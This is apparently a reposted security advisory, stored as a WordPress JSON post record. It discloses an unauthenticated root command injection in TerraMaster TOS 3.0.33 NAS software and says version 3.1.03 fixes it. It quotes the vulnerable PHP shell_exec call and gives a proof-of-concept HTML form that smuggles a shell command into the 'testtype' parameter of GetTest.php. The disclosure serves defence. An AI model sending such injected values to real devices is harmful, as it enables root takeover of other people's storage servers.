{"id":12097,"date":"2018-04-22T14:19:04","date_gmt":"2018-04-22T22:19:04","guid":{"rendered":"http:\/\/www.palada.net\/index.php\/2018\/04\/22\/news-5866\/"},"modified":"2018-04-22T14:19:04","modified_gmt":"2018-04-22T22:19:04","slug":"news-5866","status":"publish","type":"post","link":"http:\/\/www.palada.net\/index.php\/2018\/04\/22\/news-5866\/","title":{"rendered":"SSD Advisory \u2013 TerraMaster TOS Unauthenticated Remote Command Execution"},"content":{"rendered":"<p><strong>Credit to Author: SSD \/ Maor Schwartz| Date: Sun, 22 Apr 2018 07:50:33 +0000<\/strong><\/p>\n<div class=\"entry-content\">\n<p><strong>Want to get paid for a vulnerability similar to this one?<\/strong><br \/>Contact us at: <a href=\"mailto:sxsxd@bxexyxoxnxdxsxexcxuxrxixtxy.com\" onmouseover=\"this.href=this.href.replace(\/x\/g,'');\" id=\"a-href-3602\">sxsxdx@xbxexyxoxnxdxsxexcxuxrxixtxy.xcom<\/a><br \/><script>var obj = jQuery('#a-href-3602');if(obj[0]) { obj[0].innerText = obj[0].innerText.replace(\/x\/g, ''); }<\/script> See our full scope at: <a href=\"https:\/\/blogs.securiteam.com\/index.php\/product_scope\">https:\/\/blogs.securiteam.com\/index.php\/product_scope<\/a><\/p>\n<div class=\"pf-content\">\n<p><strong>Vulnerability Summary<\/strong><br \/> The following advisory describes a unauthenticated remote command execution found in TerraMaster TOS 3.0.33.<\/p>\n<p>TOS is a &#8220;Linux platform-based operating system developed for TerraMaster cloud storage NAS server. TOS 3 is the third generation operating system newly launched.&#8221;<\/p>\n<p><strong>Credit<\/strong><br \/> An independent security researcher has reported this vulnerability to Beyond Security\u2019s SecuriTeam Secure Disclosure program.<\/p>\n<p><strong>Vendor response<\/strong><br \/> The vendor stated that version 3.1.03 of TerraMaster TOS is no longer vulnerable to this vulnerability, the latest version of the software can be obtained from: http:\/\/download.terra-master.com\/download.php.<br \/> <span id=\"more-3602\"><\/span><br \/> <strong>Vulnerability details<\/strong><br \/> User controlled input is not sufficiently filtered and unauthenticated user can execute commands as root by sending a POST request to http:\/\/IP\/include\/ajax\/GetTest.php with the following parameters:<\/p>\n<ul>\n<li>dev=1<\/li>\n<li>testtype=;COMMAND-TO-RUN;<\/li>\n<li>submit=Send<\/li>\n<\/ul>\n<p>We can see in the source code that the value of parameter <em>testtype<\/em> will assign to <em>$line<\/em> and will execute by shell_exec()<\/p>\n<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-5add0a57b0b4c643738974\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> $file = &#8220;\/mnt\/base\/.&#8221;.basename($data[&#8216;dev&#8217;]).&#8221;test&#8221;;  if(!file_exists($file)) touch($file);  if(isset($data[&#8216;testtype&#8217;])){\/\/\u5f00\u59cb\u6216\u8005\u505c\u6b62\u8fc7\u7a0b&#8230;  if($data[&#8216;testtype&#8217;] != &#8216;stop&#8217;){  $line = $data[&#8216;dev&#8217;].&#8217;:&#8217;.$data[&#8216;testtype&#8217;].&#8221;:&#8221;.time();  shell_exec(&#8220;echo -e &#8220;&#8221;.$line.&#8221;&#8221; &gt; $file&#8221;);  }  $return = smartscan($data[&#8216;dev&#8217;],$data[&#8216;testtype&#8217;]);  }else{\/\/\u5f97\u5230\u72b6\u6001\u8fc7\u7a0b&#8230;  $return = smartscan($data[&#8216;dev&#8217;]);  }<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">  \t\t\t\t  \t\t\t<\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0032 seconds] -->  <\/p>\n<p><strong>Proof of Concept<\/strong><\/p>\n<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-5add0a57b0b5a283573580\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> &lt;form method=&#8221;post&#8221; action=&#8221;http:\/\/IP\/include\/ajax\/GetTest.php&#8221;&gt;  &lt;input type=&#8221;text&#8221; name=&#8221;dev&#8221; value=&#8221;1&#8243;&gt;  &lt;input type=&#8221;text&#8221; name=&#8221;testtype&#8221; value='&#8221;; sleep 5; echo &#8221; &#8216;&gt;  &lt;input type=&#8221;submit&#8221; value=&#8217;Send&#8217;&gt;  &lt;\/form&gt;<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-5add0a57b0b5a283573580-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5add0a57b0b5a283573580-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5add0a57b0b5a283573580-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5add0a57b0b5a283573580-4\">4<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5add0a57b0b5a283573580-5\">5<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-5add0a57b0b5a283573580-1\"><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-e\">form <\/span><span class=\"crayon-v\">method<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;post&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">action<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;http:\/\/IP\/include\/ajax\/GetTest.php&#8221;<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5add0a57b0b5a283573580-2\"><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-e\">input <\/span><span class=\"crayon-v\">type<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;text&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">name<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;dev&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">value<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;1&#8221;<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5add0a57b0b5a283573580-3\"><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-e\">input <\/span><span class=\"crayon-v\">type<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;text&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">name<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;testtype&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">value<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8216;&#8221;; sleep 5; echo &#8221; &#8216;<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5add0a57b0b5a283573580-4\"><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-e\">input <\/span><span class=\"crayon-v\">type<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;submit&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">value<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8216;Send&#8217;<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5add0a57b0b5a283573580-5\"><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">form<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0013 seconds] -->  <\/p>\n<div class=\"printfriendly pf-alignleft\"><a href=\"#\" rel=\"nofollow\" onclick=\"window.print(); return false;\" class=\"noslimstat\" title=\"Printer Friendly, PDF &#038; Email\"><img decoding=\"async\" style=\"border:none;-webkit-box-shadow:none; box-shadow:none;\" src=\"https:\/\/cdn.printfriendly.com\/buttons\/printfriendly-button.png\" alt=\"Print Friendly, PDF &#038; Email\" \/><\/a><\/div>\n<\/div><\/div>\n<p><a href=\"https:\/\/blogs.securiteam.com\/index.php\/archives\/3602\" target=\"bwo\" >https:\/\/blogs.securiteam.com\/index.php\/feed<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p><img decoding=\"async\" src=\"https:\/\/cdn.printfriendly.com\/buttons\/printfriendly-button.png\"\/><\/p>\n<p><strong>Credit to Author: SSD \/ Maor Schwartz| Date: Sun, 22 Apr 2018 07:50:33 +0000<\/strong><\/p>\n<p>Vulnerability Summary The following advisory describes a unauthenticated remote command execution found in TerraMaster TOS 3.0.33. TOS is a &#8220;Linux platform-based operating system developed for TerraMaster cloud storage NAS server. TOS 3 is the third generation operating system newly launched.&#8221; Credit An independent security researcher has reported this vulnerability to Beyond Security\u2019s SecuriTeam Secure Disclosure &#8230; <a href=\"https:\/\/blogs.securiteam.com\/index.php\/archives\/3602\" class=\"more-link\">Continue reading <span class=\"screen-reader-text\">SSD Advisory \u2013 TerraMaster TOS Unauthenticated Remote Command Execution<\/span><\/a><\/p>\n","protected":false},"author":4,"featured_media":0,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"colormag_page_container_layout":"default_layout","colormag_page_sidebar_layout":"default_layout","footnotes":""},"categories":[10643,10754],"tags":[11851,10757,12136],"class_list":["post-12097","post","type-post","status-publish","format-standard","hentry","category-independent","category-securiteam","tag-remote-command-execution","tag-securiteam-secure-disclosure","tag-unauthenticated-action"],"_links":{"self":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/12097","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/users\/4"}],"replies":[{"embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/comments?post=12097"}],"version-history":[{"count":0,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/12097\/revisions"}],"wp:attachment":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/media?parent=12097"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/categories?post=12097"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/tags?post=12097"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}